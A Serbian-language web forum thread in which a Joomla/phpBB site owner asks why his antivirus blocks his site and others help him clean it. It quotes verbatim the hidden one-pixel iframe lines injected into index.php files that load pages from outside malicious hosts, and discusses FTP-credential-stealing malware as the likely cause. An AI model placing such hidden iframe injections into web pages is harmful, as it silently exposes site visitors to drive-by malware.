Nod32 blokira sajt

[evilmc]

untitled.PNG

da li je ovo do mene ili stvarno na hostu imam ubacen virus?

[dmd]

Imaš.
Izbaci (verovatno u index.php-u) zadnju liniju koda:

<iframe src="http://..."></iframe>

[evilmc]

ovo su mi zadnje linije u index.php

Code: Select all

echo "<iframe src=\"http://sefauro.net/?click=6B1813\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

?>
<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>

sta tacno da izbrisem?

a ovo mi je u forumu za index.php

Code: Select all

//
// Generate the page
//
$template->pparse('body');

include($phpbb_root_path . 'includes/page_tail.'.$phpEx);



echo "<iframe src=\"http://sefauro.net/?click=1B47575\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

?>

[sofija]

Pa izbaci cledece linije"

Code: Select all

echo "<iframe src=\"http://sefauro.net/?click=6B1813\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Code: Select all

<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>

Code: Select all

echo "<iframe src=\"http://sefauro.net/?click=1B47575\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

I u buduce pazi gde skidas template, ako je to na sumljivim mestima uvek ih prvo proveri, obavezno u temlatima se nadje neki kod koji poziva udaljene scripte za instaliranje svega i svacega.

[evilmc]

I u buduce pazi gde skidas template, ako je to na sumljivim mestima uvek ih prvo proveri, obavezno u temlatima se nadje neki kod koji poziva udaljene scripte za instaliranje svega i svacega.

sajt mi je star godinu ipo i do sada nisam imao nikakvih problema...ovi frejmovi mi nisu u template, vec u root fajlovima od joomle, kao i u folderu FORUM gde su mi takodje skoro svi fajlovi zarazeni...tako da sada jedino resenje ostaje da skinem kod sebe fajlove i da skeniram sve...

[cicans]

Pogledaj u temu http://forum.joomla.org/viewtopic.php?f ... e#p1511209
Detaljno je objasnjeno - i provereno!

[Kayz]

Hello I have same problem on the same day, same thing happened to me.

Sorry i dont understand your language, anybody speak english and can help me?

Hacker put

<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>

In my index file, how they hack?

[cicans]

Hi,
You can find the answer here http://forum.joomla.org/viewtopic.php?f=432&t=335090 and here http://forum.joomla.org/viewtopic.php?f ... e#p1651899

[Vrlo Jak Tim]

Hello Kayz, there is a dozen ways how they could did it.

What you can do now is to:
- change your admin/FTP username/pass,
- download full backup of your site to your PC
- check every file if there are anywhere else those <iframe> codes
- get rid of such codes / suspicious files
- be sure that your site works locally
- upload it back to server and keep all folders permissions to 755, files to 644; do some more research about Security on this forum, and implement some protections.

Maybe the source of problem is not on your account on server, but on server itself.

[evilmc]

sredio sam...srecom sam imao backup od fajlova i sve vratio i povezao sa bazom i sada je sve kul...
hvala svima.

[evilmc]

ponovo mi napali sajt :S
ja ne znam vise sta da radim :S
nije proslo ni 3-4 sata od kako sam ga sredio :/

[vuperda]

Meni je masa sajtova pala ne od strane servera i komponenti, nego sto je moj sistem bio krsh, znaci antivirus nije bio azuran i rootkit atack je lako uradio FTP leach, posle nema veze kakav je server ili joomla ili bilo sta drugo, to me naucilo da drzim stvari sigurne kod sebe, 100 nekih zastita sada imam i sve radi ok, srecom sam imao sve azurne backupe pa je restore bio brz i posle toga reset lozinki je resio stvari.... Mislim da taj sistem find/replace kroz fajlove ne bi tako lako radio, zato je backup stvarno spas u svakom slucaju.

[evilmc]

bio je napad na server, ja sam bio svo vreme ubeđen da mi je neko napao sajt i forum :/
morao sam da obrišem sve sa hosta, i posle ubacio stari backup i stanje se stabilozovalo.

[arsago]

Pozdrav svima

Evo da se ukljucim i ja jer sam pre nekoliko meseci imao isti problem i to na svim mojim sajtovima.
Problem nije do joomle ili do servea,vec do ftp programa.Ako koristite neki ftp program za prebacivanje fajlova na server (ja sam koristio total commander) , onda imate veliki problem.
Pokupite virus na svoj komp i taj virus ukrade vas username i password iz ftp programa i onda automatski posalje virus na vas server i u sve index fajlove ubaci skriveni iframe ka sajtovima sa virusima.Takodje se ovaj kod ubacuje i u fajlove deafult.php.
Meni kad je se prvi put to desilo i to na svim sajtovima,ja sam vratio sve u normalu za kratko vreme jer sam imao backup ali posle nekoliko sati obidjem sajtove i opet na svim sajtovima virusi.
Kad sam ukapirao sta se desava onda sam izbacio ftp program iz upotrebe,otisao u direct admin i promenio sve passworde i od tada nemam vise problema.
Preporuka je da ne koristite nikakve ftp programe za prebacivanje fajlova vec da koristite c panel ili direct admin iz brovsera i naravno da u brovseru ne cuvate password vec svaki put kad se logujete onda ukucajte pass,jer bolje da svaki put kucate password nego da vam virusi uniste sajt.

Nadam se da sam nekome pomogao sa ovim mojim iskustvom.

[Leftfield]

Preporuka je da ne koristite nikakve ftp programe za prebacivanje fajlova vec da koristite c panel ili direct admin iz brovsera i naravno da u brovseru ne cuvate password vec svaki put kad se logujete onda ukucajte pass,jer bolje da svaki put kucate password nego da vam virusi uniste sajt.

Ni to nije neka solucija. Ako cemo iskreno, jedina, ali jedina solucija je da se maknete sa Windowza i da koristite neki *nix sistem.

[vuperda]

Ni to nije neka solucija. Ako cemo iskreno, jedina, ali jedina solucija je da se maknete sa Windowza i da koristite neki *nix sistem.

To vecini ljudi nece biti izvodljivo iz raznoraznih razloga jos dugo vremena...
Postoji i jedna zanimljiva solucija, portable FTP klijenti, oni samim tim nisu registrovani u sistemu tako da ih po zarazi sistema nije moguce tako lako detektovati, zapravo je najbolje preci na sve portabilne verzije, bilo FTP ili drugih programa...

[Leftfield]

Opet cemo jedno te isto. Jok. Ni to nije sigurno.

Najsigurnija stvar, tj. najbolja opcija je trenutno jxplorer ili neka komponenta koja se instalira na sajtu pa se vuku fajlovi pomocu nje. Ostalo a da valja je *nix.

Da li vecini odgovara ili ne? O tome necu da vodim polemiku. Ako ti je potrebno onda moraš a ako nije onda plaćaj i trpi.